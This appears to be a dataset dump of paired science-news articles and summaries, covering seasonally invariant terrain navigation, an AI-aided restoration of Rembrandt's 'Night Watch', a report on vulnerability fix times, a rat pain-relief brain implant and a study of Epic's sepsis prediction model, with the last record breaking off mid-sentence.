Deep learning makes visual terrain-relative navigation more practical Without GPS, autonomous systems get lost easily. Now a new algorithm developed at Caltech allows autonomous systems to recognize where they are simply by looking at the terrain around them - and for the first time, the technology works regardless of seasonal changes to that terrain. Details about the process were published on June 23 in the journal Science Robotics , published by the American Association for the Advancement of Science (AAAS). The general process, known as visual terrain-relative navigation (VTRN), was first developed in the 1960s. By comparing nearby terrain to high-resolution satellite images, autonomous systems can locate themselves. The problem is that, in order for it to work, the current generation of VTRN requires that the terrain it is looking at closely matches the images in its database. Anything that alters or obscures the terrain, such as snow cover or fallen leaves, causes the images to not match up and fouls up the system. So, unless there is a database of the landscape images under every conceivable condition, VTRN systems can be easily confused. To overcome this challenge, a team from the lab of Soon-Jo Chung , Bren Professor of Aerospace and Control and Dynamical Systems and research scientist at JPL, which Caltech manages for NASA, turned to deep learning and artificial intelligence (AI) to remove seasonal content that hinders current VTRN systems. "The rule of thumb is that both images - the one from the satellite and the one from the autonomous vehicle - have to have identical content for current techniques to work. The differences that they can handle are about what can be accomplished with an Instagram filter that changes an image's hues," says Anthony Fragoso (MS '14, PhD '18), lecturer and staff scientist, and lead author of the Science Robotics paper. "In real systems, however, things change drastically based on season because the images no longer contain the same objects and cannot be directly compared." The process - developed by Chung and Fragoso in collaboration with graduate student Connor Lee (BS '17, MS '19) and undergraduate student Austin McCoy - uses what is known as "self-supervised learning." While most computer-vision strategies rely on human annotators who carefully curate large data sets to teach an algorithm how to recognize what it is seeing, this one instead lets the algorithm teach itself. The AI looks for patterns in images by teasing out details and features that would likely be missed by humans. Supplementing the current generation of VTRN with the new system yields more accurate localization: in one experiment, the researchers attempted to localize images of summer foliage against winter leaf-off imagery using a correlation-based VTRN technique. They found that performance was no better than a coin flip, with 50 percent of attempts resulting in navigation failures. In contrast, insertion of the new algorithm into the VTRN worked far better: 92 percent of attempts were correctly matched, and the remaining 8 percent could be identified as problematic in advance, and then easily managed using other established navigation techniques. "Computers can find obscure patterns that our eyes can't see and can pick up even the smallest trend," says Lee. VTRN was in danger turning into an infeasible technology in common but challenging environments, he says. "We rescued decades of work in solving this problem." Beyond the utility for autonomous drones on Earth, the system also has applications for space missions. The entry, descent, and landing (EDL) system on JPL's Mars 2020 Perseverance rover mission, for example, used VTRN for the first time on the Red Planet to land at the Jezero Crater, a site that was previously considered too hazardous for a safe entry. With rovers such as Perseverance , "a certain amount of autonomous driving is necessary," Chung says, "since transmissions could take 20 minutes to travel between Earth and Mars, and there is no GPS on Mars." The team considered the Martian polar regions that also have intense seasonal changes, conditions similar to Earth, and the new system could allow for improved navigation to support scientific objectives including the search for water. Next, Fragoso, Lee, and Chung will expand the technology to account for changes in the weather as well: fog, rain, snow, and so on. If successful, their work could help improve navigation systems for driverless cars. The Science Robotics paper is titled " A Seasonally-Invariant Deep Transform for Visual Terrain-Relative Navigation ." This project was funded by the Boeing Company, and the National Science Foundation. McCoy participated though Caltech's Summer Undergraduate Research Fellowship program .
Visual terrain-relative navigation (VTRN) now can operate effectively regardless of seasonal changes, thanks to a new algorithm. California Institute of Technology researchers applied deep learning and artificial intelligence to eliminate seasonal content that can trip up VTRN systems, which rely on close similarity between the terrain they are looking at and database images. The algorithm utilizes self-supervised learning to educate itself, seeking patterns in images by parsing out details and properties that humans likely would overlook. VTRN systems equipped with the algorithm can localize more accurately: one upgraded system could match 92% of images of summer foliage against winter leaf-off imagery, with the remaining 8% easily addressed through other methods.
[]
[]
[]
scitechnews
None
None
None
None
Visual terrain-relative navigation (VTRN) now can operate effectively regardless of seasonal changes, thanks to a new algorithm. California Institute of Technology researchers applied deep learning and artificial intelligence to eliminate seasonal content that can trip up VTRN systems, which rely on close similarity between the terrain they are looking at and database images. The algorithm utilizes self-supervised learning to educate itself, seeking patterns in images by parsing out details and properties that humans likely would overlook. VTRN systems equipped with the algorithm can localize more accurately: one upgraded system could match 92% of images of summer foliage against winter leaf-off imagery, with the remaining 8% easily addressed through other methods. Deep learning makes visual terrain-relative navigation more practical Without GPS, autonomous systems get lost easily. Now a new algorithm developed at Caltech allows autonomous systems to recognize where they are simply by looking at the terrain around them - and for the first time, the technology works regardless of seasonal changes to that terrain. Details about the process were published on June 23 in the journal Science Robotics , published by the American Association for the Advancement of Science (AAAS). The general process, known as visual terrain-relative navigation (VTRN), was first developed in the 1960s. By comparing nearby terrain to high-resolution satellite images, autonomous systems can locate themselves. The problem is that, in order for it to work, the current generation of VTRN requires that the terrain it is looking at closely matches the images in its database. Anything that alters or obscures the terrain, such as snow cover or fallen leaves, causes the images to not match up and fouls up the system. So, unless there is a database of the landscape images under every conceivable condition, VTRN systems can be easily confused. To overcome this challenge, a team from the lab of Soon-Jo Chung , Bren Professor of Aerospace and Control and Dynamical Systems and research scientist at JPL, which Caltech manages for NASA, turned to deep learning and artificial intelligence (AI) to remove seasonal content that hinders current VTRN systems. "The rule of thumb is that both images - the one from the satellite and the one from the autonomous vehicle - have to have identical content for current techniques to work. The differences that they can handle are about what can be accomplished with an Instagram filter that changes an image's hues," says Anthony Fragoso (MS '14, PhD '18), lecturer and staff scientist, and lead author of the Science Robotics paper. "In real systems, however, things change drastically based on season because the images no longer contain the same objects and cannot be directly compared." The process - developed by Chung and Fragoso in collaboration with graduate student Connor Lee (BS '17, MS '19) and undergraduate student Austin McCoy - uses what is known as "self-supervised learning." While most computer-vision strategies rely on human annotators who carefully curate large data sets to teach an algorithm how to recognize what it is seeing, this one instead lets the algorithm teach itself. The AI looks for patterns in images by teasing out details and features that would likely be missed by humans. Supplementing the current generation of VTRN with the new system yields more accurate localization: in one experiment, the researchers attempted to localize images of summer foliage against winter leaf-off imagery using a correlation-based VTRN technique. They found that performance was no better than a coin flip, with 50 percent of attempts resulting in navigation failures. In contrast, insertion of the new algorithm into the VTRN worked far better: 92 percent of attempts were correctly matched, and the remaining 8 percent could be identified as problematic in advance, and then easily managed using other established navigation techniques. "Computers can find obscure patterns that our eyes can't see and can pick up even the smallest trend," says Lee. VTRN was in danger turning into an infeasible technology in common but challenging environments, he says. "We rescued decades of work in solving this problem." Beyond the utility for autonomous drones on Earth, the system also has applications for space missions. The entry, descent, and landing (EDL) system on JPL's Mars 2020 Perseverance rover mission, for example, used VTRN for the first time on the Red Planet to land at the Jezero Crater, a site that was previously considered too hazardous for a safe entry. With rovers such as Perseverance , "a certain amount of autonomous driving is necessary," Chung says, "since transmissions could take 20 minutes to travel between Earth and Mars, and there is no GPS on Mars." The team considered the Martian polar regions that also have intense seasonal changes, conditions similar to Earth, and the new system could allow for improved navigation to support scientific objectives including the search for water. Next, Fragoso, Lee, and Chung will expand the technology to account for changes in the weather as well: fog, rain, snow, and so on. If successful, their work could help improve navigation systems for driverless cars. The Science Robotics paper is titled " A Seasonally-Invariant Deep Transform for Visual Terrain-Relative Navigation ." This project was funded by the Boeing Company, and the National Science Foundation. McCoy participated though Caltech's Summer Undergraduate Research Fellowship program .
207
Rembrandt's 'Night Watch' on Display with Missing Figures Restored by AI
AMSTERDAM, June 23 (Reuters) - For the first time in 300 years, Rembrandt's famed "The Night Watch" is back on display in what researchers say is its original size, with missing parts temporarily restored in an exhibition aided by artificial intelligence. Rembrandt finished the large canvas, which portrays the captain of an Amsterdam city militia ordering his men into action, in 1642. Although it is now considered one of the greatest masterpieces of the Dutch Golden Age, strips were cut from all four sides of it during a move in 1715. Though those strips have not been found, another artist of the time had made a copy, and restorers and computer scientists have used that, blended with Rembrandt's style, to recreate the missing parts. "It's never the real thing, but I think it gives you different insight into the composition," Rijksmuseum director Taco Dibbits said. The effect is a little like seeing a photo cropped as the photographer would have wanted. The central figure in the painting, Captain Frans Bannink Cocq, now appears more off-centre, as he was in Rembrandt's original version, making the work more dynamic. Some of the figure of a drummer entering the frame on the far right has been restored, as he marches onto the scene, prompting a dog to bark. Three restored figures that had been missing on the left, not highly detailed, are onlookers, not members of the militia. That was an effect Rembrandt intended, Dibbits said, to draw the viewer into the painting. Rijksmuseum Senior Scientist Robert Erdmann explained some of the steps in crafting the missing parts, which are hung to overlap the original work without touching it. First both "The Night Watch" and the much smaller copy, which is attributed to Gerrit Lundens and dated to around 1655, had to be carefully photographed. Then researchers scaled the images to the same size, and warped the Lundens work to fit better with the Rembrandt where there were minor differences in placement of figures and objects. The artificial intelligence software learned by trying millions of times to approximate Rembrandt's style and colours more closely. Humans judged the success. Erdemann said the result was good enough that the AI had "hallucinated" cracks in the paint in some spots as it translated Lundens work into Rembrandt. But asked whether this is the best possible restoration of "The Night Watch," he said no. "I think technique will always be able to improve." Our Standards: The Thomson Reuters Trust Principles.
Researchers at the Rijksmuseum in the Netherlands used artificial intelligence to restore missing parts of Rembrandt's "The Night Watch" for a new exhibit. This marks the first time in 300 years that the 1642 painting is on display in its original size. Strips that were cut from all four sides of the painting during a 1715 move and later lost were recreated by restorers and computer scientists with the help of a copy made by another artist of the time. Images of the original painting and the smaller 1655 copy attributed to Gerrit Lundens were scaled to the same size, with the Lundens work warped to fit with the Rembrandt where the placement of figures and objects slightly differed.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the Rijksmuseum in the Netherlands used artificial intelligence to restore missing parts of Rembrandt's "The Night Watch" for a new exhibit. This marks the first time in 300 years that the 1642 painting is on display in its original size. Strips that were cut from all four sides of the painting during a 1715 move and later lost were recreated by restorers and computer scientists with the help of a copy made by another artist of the time. Images of the original painting and the smaller 1655 copy attributed to Gerrit Lundens were scaled to the same size, with the Lundens work warped to fit with the Rembrandt where the placement of figures and objects slightly differed. AMSTERDAM, June 23 (Reuters) - For the first time in 300 years, Rembrandt's famed "The Night Watch" is back on display in what researchers say is its original size, with missing parts temporarily restored in an exhibition aided by artificial intelligence. Rembrandt finished the large canvas, which portrays the captain of an Amsterdam city militia ordering his men into action, in 1642. Although it is now considered one of the greatest masterpieces of the Dutch Golden Age, strips were cut from all four sides of it during a move in 1715. Though those strips have not been found, another artist of the time had made a copy, and restorers and computer scientists have used that, blended with Rembrandt's style, to recreate the missing parts. "It's never the real thing, but I think it gives you different insight into the composition," Rijksmuseum director Taco Dibbits said. The effect is a little like seeing a photo cropped as the photographer would have wanted. The central figure in the painting, Captain Frans Bannink Cocq, now appears more off-centre, as he was in Rembrandt's original version, making the work more dynamic. Some of the figure of a drummer entering the frame on the far right has been restored, as he marches onto the scene, prompting a dog to bark. Three restored figures that had been missing on the left, not highly detailed, are onlookers, not members of the militia. That was an effect Rembrandt intended, Dibbits said, to draw the viewer into the painting. Rijksmuseum Senior Scientist Robert Erdmann explained some of the steps in crafting the missing parts, which are hung to overlap the original work without touching it. First both "The Night Watch" and the much smaller copy, which is attributed to Gerrit Lundens and dated to around 1655, had to be carefully photographed. Then researchers scaled the images to the same size, and warped the Lundens work to fit better with the Rembrandt where there were minor differences in placement of figures and objects. The artificial intelligence software learned by trying millions of times to approximate Rembrandt's style and colours more closely. Humans judged the success. Erdemann said the result was good enough that the AI had "hallucinated" cracks in the paint in some spots as it translated Lundens work into Rembrandt. But asked whether this is the best possible restoration of "The Night Watch," he said no. "I think technique will always be able to improve." Our Standards: The Thomson Reuters Trust Principles.
208
Average Time to Fix Critical Cybersecurity Vulnerabilities is 205 Days: Report
A new report from WhiteHat Security has found that the average time taken to fix critical cybersecurity vulnerabilities has increased from 197 days in April 2021 to 205 days in May 2021. In its AppSec Stats Flash report, WhiteHat Security researchers found that organizations in the utility sector had the highest exposure window with their application vulnerabilities, spotlighting a problem that made national news last week when it was revealed more than 50,000 water treatment plants across the US had lackluster cybersecurity. In addition to an attack on a water treatment plant in Florida earlier this year, it was revealed that there had been multiple attacks on utilities that were never reported. According to the report, more than 66% of all applications used by the utility sector had at least one exploitable vulnerability open throughout the year. Setu Kulkarni, a vice president at WhiteHat Security, said over 60% of applications in the manufacturing industry also had a window of exposure of over 365 days. "At the same time, they have a very small number of applications that have a window of exposure that is less than 30 days -- meaning applications where exploitable serious vulnerabilities get fixed under a month," Kulkarni explained, noting that the finance and insurance industries did a better job of addressing vulnerabilities. "Finance has a much more balanced window of exposure outlook. About 40% of applications have a WoE of 365 days, but about 30% have a WoE of fewer than 30 days." WhiteHat Security researchers said the top five vulnerability classes seen over the last three months include information leakage, insufficient session expiration, cross-site scripting, insufficient transport layer protection and content spoofing. The report notes that many of these vulnerabilities are "pedestrian" and require little effort or skill to discover and exploit. Kulkarni said the company decided to switch from releasing the report annually to publishing it monthly due to the sheer number of new applications that are developed, changed and deployed, especially since the onset of the COVID-19 pandemic . The threat landscape has also evolved and expanded alongside the explosion in application development. Kulkarni noted that the situation had spotlighted the lack of cybersecurity talent available to most organizations and the general lack of resources for many industries struggling to manage updates and patches for hundreds of applications. "We look at the window of exposure by the industry as a bellwether metric for breach exposure. When you look at industries like utilities or manufacturing that have been laggards in digital transformation when compared to finance and healthcare, we find that they have a window of exposure data in a complete disbalance," Kulkarni told ZDNet . "The key takeaway from this data is that organizations that are able to adapt their AppSec program to cater to the needs of legacy and new applications fare much better at balancing the window of exposure for their applications. That is what I am calling it two-speed AppSec: focusing on production testing and mitigation for legacy applications; focusing on production and pre-production testing and balancing mitigation as well as remediation for newer applications." Every application today is internet-connected either directly or indirectly, Kulkarni added, explaining that this means the impact of vulnerabilities can potentially affect hundreds of thousands of end-users, if not millions. Kulkarni suggested organizations distribute the responsibility of security more broadly to all the stakeholders beyond just security and IT teams that often lack the budget or the resources to handle security meticulously. "Security is a team sport, and for the longest time, there has been a disproportionate share of responsibility placed on security and IT teams. "Development teams are pressed for time, and they are in no position to undergo multiple hours of point-in-time dedicated security training. A better approach is for the security teams to identify the top 1-3 vulnerabilities that are trending in the applications they are testing and provide development teams bite-size training focused on those vulnerabilities."
Software security adviser WhiteHat Security has estimated that the average time to correct critical cybersecurity vulnerabilities increased from 197 days to 205 days between April and May 2021. WhiteHat researchers determined that 66% of all apps used by the utility sector had at least one exploitable bug exposed throughout the year. The top five vulnerability classes WhiteHat researchers observed over the last three months were information leakage, insufficient session expiration, cross-site scripting, insufficient transport layer protection, and content spoofing; many such bugs also can be found and leveraged with little skill or effort. WhiteHat's Setu Kulkarni said the situation highlights a dearth of cybersecurity talent available to most organizations, and an overall scarcity of resources for many sectors wrestling with updates and patches for numerous apps.
[]
[]
[]
scitechnews
None
None
None
None
Software security adviser WhiteHat Security has estimated that the average time to correct critical cybersecurity vulnerabilities increased from 197 days to 205 days between April and May 2021. WhiteHat researchers determined that 66% of all apps used by the utility sector had at least one exploitable bug exposed throughout the year. The top five vulnerability classes WhiteHat researchers observed over the last three months were information leakage, insufficient session expiration, cross-site scripting, insufficient transport layer protection, and content spoofing; many such bugs also can be found and leveraged with little skill or effort. WhiteHat's Setu Kulkarni said the situation highlights a dearth of cybersecurity talent available to most organizations, and an overall scarcity of resources for many sectors wrestling with updates and patches for numerous apps. A new report from WhiteHat Security has found that the average time taken to fix critical cybersecurity vulnerabilities has increased from 197 days in April 2021 to 205 days in May 2021. In its AppSec Stats Flash report, WhiteHat Security researchers found that organizations in the utility sector had the highest exposure window with their application vulnerabilities, spotlighting a problem that made national news last week when it was revealed more than 50,000 water treatment plants across the US had lackluster cybersecurity. In addition to an attack on a water treatment plant in Florida earlier this year, it was revealed that there had been multiple attacks on utilities that were never reported. According to the report, more than 66% of all applications used by the utility sector had at least one exploitable vulnerability open throughout the year. Setu Kulkarni, a vice president at WhiteHat Security, said over 60% of applications in the manufacturing industry also had a window of exposure of over 365 days. "At the same time, they have a very small number of applications that have a window of exposure that is less than 30 days -- meaning applications where exploitable serious vulnerabilities get fixed under a month," Kulkarni explained, noting that the finance and insurance industries did a better job of addressing vulnerabilities. "Finance has a much more balanced window of exposure outlook. About 40% of applications have a WoE of 365 days, but about 30% have a WoE of fewer than 30 days." WhiteHat Security researchers said the top five vulnerability classes seen over the last three months include information leakage, insufficient session expiration, cross-site scripting, insufficient transport layer protection and content spoofing. The report notes that many of these vulnerabilities are "pedestrian" and require little effort or skill to discover and exploit. Kulkarni said the company decided to switch from releasing the report annually to publishing it monthly due to the sheer number of new applications that are developed, changed and deployed, especially since the onset of the COVID-19 pandemic . The threat landscape has also evolved and expanded alongside the explosion in application development. Kulkarni noted that the situation had spotlighted the lack of cybersecurity talent available to most organizations and the general lack of resources for many industries struggling to manage updates and patches for hundreds of applications. "We look at the window of exposure by the industry as a bellwether metric for breach exposure. When you look at industries like utilities or manufacturing that have been laggards in digital transformation when compared to finance and healthcare, we find that they have a window of exposure data in a complete disbalance," Kulkarni told ZDNet . "The key takeaway from this data is that organizations that are able to adapt their AppSec program to cater to the needs of legacy and new applications fare much better at balancing the window of exposure for their applications. That is what I am calling it two-speed AppSec: focusing on production testing and mitigation for legacy applications; focusing on production and pre-production testing and balancing mitigation as well as remediation for newer applications." Every application today is internet-connected either directly or indirectly, Kulkarni added, explaining that this means the impact of vulnerabilities can potentially affect hundreds of thousands of end-users, if not millions. Kulkarni suggested organizations distribute the responsibility of security more broadly to all the stakeholders beyond just security and IT teams that often lack the budget or the resources to handle security meticulously. "Security is a team sport, and for the longest time, there has been a disproportionate share of responsibility placed on security and IT teams. "Development teams are pressed for time, and they are in no position to undergo multiple hours of point-in-time dedicated security training. A better approach is for the security teams to identify the top 1-3 vulnerabilities that are trending in the applications they are testing and provide development teams bite-size training focused on those vulnerabilities."
209
Implantable Brain Device Relieves Pain in Early Study
A computerized brain implant effectively relieves short-term and chronic pain in rodents, a new study finds. The experiments, conducted by investigators at NYU Grossman School of Medicine, offer what the researchers call a "blueprint" for the development of brain implants to treat pain syndromes and other brain-based disorders, such as anxiety , depression , and panic attacks. Published June 21 in the journal Nature Biomedical Engineering , the study showed that device-implanted rats withdrew their paws 40 percent more slowly from sudden pain compared with times when their device was turned off. According to the study authors, this suggests that the device reduced the intensity of the pain the rodents experienced. In addition, animals in sudden or continuous pain spent about two-thirds more time in a chamber where the computer-controlled device was turned on than in a chamber where it was not. Researchers say the investigation is the first to use a computerized brain implant to detect and relieve bursts of pain in real time. The device is also the first of its kind to target chronic pain, which often occurs without being prompted by a known trigger, the study authors say. "Our findings show that this implant offers an effective strategy for pain therapy, even in cases where symptoms are traditionally difficult to pinpoint or manage," says senior study author Jing Wang, MD, PhD , the Valentino D.B. Mazzia, MD, JD, Associate Professor and the vice chair for clinical and translational research in the Department of Anesthesiology, Perioperative Care, and Pain Medicine at NYU Langone. Chronic pain is estimated to affect one in four adults in the United States, yet until now, safe and reliable treatments have proven elusive, says Dr. Wang, who is also director of NYU Langone's Interdisciplinary Pain Research Program . Particularly for pain that keeps coming back, current therapies such as opioids often grow less effective over time as people become desensitized to the treatment. In addition, drugs such as opioids activate the reward centers of the brain to create feelings of pleasure that may lead to addiction . Computerized brain implants, previously investigated to prevent epileptic seizures and control prosthetic devices, may avert many of these issues, says Dr. Wang. The technology, known as a closed-loop brain-machine interface, detects brain activity in the anterior cingulate cortex, a region of the brain that is critical for pain processing. A computer linked to the device then automatically identifies electrical patterns in the brain closely linked to pain. When signs of pain are detected, the computer triggers therapeutic stimulation of another region of the brain, the prefrontal cortex, to ease it. Since the device is only activated in the presence of pain, Dr. Wang says, it lessens the risk of overuse and any potential for tolerance to develop. Furthermore, because the implant offers no reward beyond pain relief, as opioids do, the risk of addiction is minimized. As part of the study, the researchers installed tiny electrodes in the brains of dozens of rats and then exposed them to carefully measured amounts of pain. The animals were closely monitored for how quickly they moved away from the pain source. This allowed the investigators to track how often the device correctly identified pain-based brain activity in the anterior cingulate cortex and how effectively it could lessen the resulting sensation. According to the study authors, the implant accurately detected pain up to 80 percent of the time. "Our results demonstrate that this device may help researchers better understand how pain works in the brain," says lead study investigator Qiaosheng Zhang, PhD, a doctoral fellow in the Department of Anesthesiology, Perioperative Care, and Pain Medicine at NYU Langone. "Moreover, it may allow us to find non-drug therapies for other neuropsychiatric disorders, such as anxiety, depression, and post-traumatic stress." Dr. Zhang adds that the implant's pain detection properties could be improved by installing electrodes in other regions of the brain beyond the anterior cingulate cortex. He cautions, however, that the technology is not yet suitable for use in people, but says plans are underway to investigate less invasive forms with potential to be adapted for human use. Funding for the study was provided by National Institutes of Health grants R01 NS100065, R01 GM115384, and R01 MH118928, and National Science Foundation grant CBET 1835000. In addition to Dr. Wang and Dr. Zhang, other NYU Langone researchers were Sile Hu, MS; Robert Talay; Amrita Singh, BA; Bassir Caravan, BS; Zhengdong Xiao, MS; David Rosenberg, BS; Anna Li, BM; Johnathan D. Gould; Yaling Liu; Guanghao Sun; and Zhe S. Chen, PhD . Shira Polan Phone: 212-404-4279 [email protected]
Experiments by New York University (NYU) Langone scientists demonstrated a computerized brain implant's ability to relieve short-term and chronic pain in rodents. The closed-loop brain-machine interface identifies activity in the anterior cingulate cortex, an area of the brain essential for pain processing; when a computer connected to the implant automatically detects electrical patterns closely associated with pain, it directs the implant to relieve it by stimulating the prefrontal cortex. The NYU Langone researchers implanted electrodes in the brains of dozens of rats, then exposed them to carefully measured amounts of pain, monitoring for how fast they withdrew from the pain source. The researchers said the device accurately detected pain up to 80% of the time.
[]
[]
[]
scitechnews
None
None
None
None
Experiments by New York University (NYU) Langone scientists demonstrated a computerized brain implant's ability to relieve short-term and chronic pain in rodents. The closed-loop brain-machine interface identifies activity in the anterior cingulate cortex, an area of the brain essential for pain processing; when a computer connected to the implant automatically detects electrical patterns closely associated with pain, it directs the implant to relieve it by stimulating the prefrontal cortex. The NYU Langone researchers implanted electrodes in the brains of dozens of rats, then exposed them to carefully measured amounts of pain, monitoring for how fast they withdrew from the pain source. The researchers said the device accurately detected pain up to 80% of the time. A computerized brain implant effectively relieves short-term and chronic pain in rodents, a new study finds. The experiments, conducted by investigators at NYU Grossman School of Medicine, offer what the researchers call a "blueprint" for the development of brain implants to treat pain syndromes and other brain-based disorders, such as anxiety , depression , and panic attacks. Published June 21 in the journal Nature Biomedical Engineering , the study showed that device-implanted rats withdrew their paws 40 percent more slowly from sudden pain compared with times when their device was turned off. According to the study authors, this suggests that the device reduced the intensity of the pain the rodents experienced. In addition, animals in sudden or continuous pain spent about two-thirds more time in a chamber where the computer-controlled device was turned on than in a chamber where it was not. Researchers say the investigation is the first to use a computerized brain implant to detect and relieve bursts of pain in real time. The device is also the first of its kind to target chronic pain, which often occurs without being prompted by a known trigger, the study authors say. "Our findings show that this implant offers an effective strategy for pain therapy, even in cases where symptoms are traditionally difficult to pinpoint or manage," says senior study author Jing Wang, MD, PhD , the Valentino D.B. Mazzia, MD, JD, Associate Professor and the vice chair for clinical and translational research in the Department of Anesthesiology, Perioperative Care, and Pain Medicine at NYU Langone. Chronic pain is estimated to affect one in four adults in the United States, yet until now, safe and reliable treatments have proven elusive, says Dr. Wang, who is also director of NYU Langone's Interdisciplinary Pain Research Program . Particularly for pain that keeps coming back, current therapies such as opioids often grow less effective over time as people become desensitized to the treatment. In addition, drugs such as opioids activate the reward centers of the brain to create feelings of pleasure that may lead to addiction . Computerized brain implants, previously investigated to prevent epileptic seizures and control prosthetic devices, may avert many of these issues, says Dr. Wang. The technology, known as a closed-loop brain-machine interface, detects brain activity in the anterior cingulate cortex, a region of the brain that is critical for pain processing. A computer linked to the device then automatically identifies electrical patterns in the brain closely linked to pain. When signs of pain are detected, the computer triggers therapeutic stimulation of another region of the brain, the prefrontal cortex, to ease it. Since the device is only activated in the presence of pain, Dr. Wang says, it lessens the risk of overuse and any potential for tolerance to develop. Furthermore, because the implant offers no reward beyond pain relief, as opioids do, the risk of addiction is minimized. As part of the study, the researchers installed tiny electrodes in the brains of dozens of rats and then exposed them to carefully measured amounts of pain. The animals were closely monitored for how quickly they moved away from the pain source. This allowed the investigators to track how often the device correctly identified pain-based brain activity in the anterior cingulate cortex and how effectively it could lessen the resulting sensation. According to the study authors, the implant accurately detected pain up to 80 percent of the time. "Our results demonstrate that this device may help researchers better understand how pain works in the brain," says lead study investigator Qiaosheng Zhang, PhD, a doctoral fellow in the Department of Anesthesiology, Perioperative Care, and Pain Medicine at NYU Langone. "Moreover, it may allow us to find non-drug therapies for other neuropsychiatric disorders, such as anxiety, depression, and post-traumatic stress." Dr. Zhang adds that the implant's pain detection properties could be improved by installing electrodes in other regions of the brain beyond the anterior cingulate cortex. He cautions, however, that the technology is not yet suitable for use in people, but says plans are underway to investigate less invasive forms with potential to be adapted for human use. Funding for the study was provided by National Institutes of Health grants R01 NS100065, R01 GM115384, and R01 MH118928, and National Science Foundation grant CBET 1835000. In addition to Dr. Wang and Dr. Zhang, other NYU Langone researchers were Sile Hu, MS; Robert Talay; Amrita Singh, BA; Bassir Caravan, BS; Zhengdong Xiao, MS; David Rosenberg, BS; Anna Li, BM; Johnathan D. Gould; Yaling Liu; Guanghao Sun; and Zhe S. Chen, PhD . Shira Polan Phone: 212-404-4279 [email protected]
212
Algorithm That Predicts Deadly Infections Is Often Flawed
A complication of infection known as sepsis is the number one killer in US hospitals. So it's not surprising that more than 100 health systems use an early warning system offered by Epic Systems, the dominant provider of US electronic health records. The system throws up alerts based on a proprietary formula tirelessly watching for signs of the condition in a patient's test results. But a new study using data from nearly 30,000 patients in University of Michigan hospitals suggests Epic's system performs poorly. The authors say it missed two-thirds of sepsis cases, rarely found cases medical staff did not notice, and frequently issued false alarms. Karandeep Singh, an assistant professor at University of Michigan who led the study, says the findings illustrate a broader problem with the proprietary algorithms increasingly used in health care. "They're very widely used, and yet there's very little published on these models," Singh says. "To me that's shocking." The study was published Monday in JAMA Internal Medicine . An Epic spokesperson disputed the study's conclusions, saying the company's system has "helped clinicians save thousands of lives." Epic's is not the first widely used health algorithm to trigger concerns that technology supposed to improve health care is not delivering, or even actively harmful. In 2019, a system used on millions of patients to prioritize access to special care for people with complex needs was found to lowball the needs of Black patients compared to white patients. That prompted some Democratic senators to ask federal regulators to investigate bias in health algorithms. A study published in April found that statistical models used to predict suicide risk in mental health patients performed well for white and Asian patients but poorly for Black patients. The way sepsis stalks hospital wards has made it a special target of algorithmic aids for medical staff. Guidelines from the Centers for Disease Control and Prevention to health providers on sepsis encourage use of electronic medical records for surveillance and predictions. Epic has several competitors offering commercial warning systems, and some US research hospitals have built their own tools . Automated sepsis warnings have huge potential, Singh says, because key symptoms of the condition, such as low blood pressure, can have other causes, making it difficult for staff to spot early. Starting sepsis treatment such as antibiotics just an hour sooner can make a big difference to patient survival. Hospital administrators often take special interest in sepsis response, in part because it contributes to US government hospital ratings . Singh runs a lab at Michigan researching applications of machine learning to patient care. He got curious about Epic's sepsis warning system after being asked to chair a committee at the university's health system created to oversee uses of machine learning. As Singh learned more about the tools in use at Michigan and other health systems, he became concerned that they mostly came from vendors that disclosed little about how they worked or performed. His own system had a license to use Epic's sepsis prediction model, which the company told customers was highly accurate. But there had been no independent validation of its performance. Singh and Michigan colleagues tested Epic's prediction model on records for nearly 30,000 patients covering almost 40,000 hospitalizations in 2018 and 2019. The researchers noted how often Epic's algorithm flagged people who developed sepsis as defined by the CDC and the Centers for Medicare and Medicaid Services. And they compared the alerts that the system would have triggered with sepsis treatments logged by staff, who did not see Epic sepsis alerts for patients included in the study. The researchers say their results suggest Epic's system wouldn't make a hospital much better at catching sepsis and could burden staff with unnecessary alerts. The company's algorithm did not identify two-thirds of the roughly 2,500 sepsis cases in the Michigan data. It would have alerted for 183 patients who developed sepsis but had not been given timely treatment by staff.
An algorithm designed by U.S. electronic health record provider Epic Systems to forecast sepsis infections is significantly lacking in accuracy, according to an analysis of data on about 30,000 patients in University of Michigan (U-M) hospitals. U-M researchers said the program overlooked two-thirds of the approximately 2,500 sepsis cases in the data, rarely detected cases missed by medical staff, and was prone to false alarms. The researchers said Epic tells customers its sepsis alert system can correctly differentiate two patients with and without sepsis with at least 76% accuracy, but they determined it was only 63% accurate. U-M's Karandeep Singh said the study highlights wider shortcomings with proprietary algorithms increasingly used in healthcare, noting that the lack of published science on these models is "shocking."
[]
[]
[]
scitechnews
None
None
None
None
An algorithm designed by U.S. electronic health record provider Epic Systems to forecast sepsis infections is significantly lacking in accuracy, according to an analysis of data on about 30,000 patients in University of Michigan (U-M) hospitals. U-M researchers said the program overlooked two-thirds of the approximately 2,500 sepsis cases in the data, rarely detected cases missed by medical staff, and was prone to false alarms. The researchers said Epic tells customers its sepsis alert system can correctly differentiate two patients with and without sepsis with at least 76% accuracy, but they determined it was only 63% accurate. U-M's Karandeep Singh said the study highlights wider shortcomings with proprietary algorithms increasingly used in healthcare, noting that the lack of published science on these models is "shocking." A complication of infection known as sepsis is the number one killer in US hospitals. So it's not surprising that more than 100 health systems use an early warning system offered by Epic Systems, the dominant provider of US electronic health records. The system throws up alerts based on a proprietary formula tirelessly watching for signs of the condition in a patient's test results. But a new study using data from nearly 30,000 patients in University of Michigan hospitals suggests Epic's system performs poorly. The authors say it missed two-thirds of sepsis cases, rarely found cases medical staff did not notice, and frequently issued false alarms. Karandeep Singh, an assistant professor at University of Michigan who led the study, says the findings illustrate a broader problem with the proprietary algorithms increasingly used in health care. "They're very widely used, and yet there's very little published on these models," Singh says. "To me that's shocking." The study was published Monday in JAMA Internal Medicine . An Epic spokesperson disputed the study's conclusions, saying the company's system has "helped clinicians save thousands of lives." Epic's is not the first widely used health algorithm to trigger concerns that technology supposed to improve health care is not delivering, or even actively harmful. In 2019, a system used on millions of patients to prioritize access to special care for people with complex needs was found to lowball the needs of Black patients compared to white patients. That prompted some Democratic senators to ask federal regulators to investigate bias in health algorithms. A study published in April found that statistical models used to predict suicide risk in mental health patients performed well for white and Asian patients but poorly for Black patients. The way sepsis stalks hospital wards has made it a special target of algorithmic aids for medical staff. Guidelines from the Centers for Disease Control and Prevention to health providers on sepsis encourage use of electronic medical records for surveillance and predictions. Epic has several competitors offering commercial warning systems, and some US research hospitals have built their own tools . Automated sepsis warnings have huge potential, Singh says, because key symptoms of the condition, such as low blood pressure, can have other causes, making it difficult for staff to spot early. Starting sepsis treatment such as antibiotics just an hour 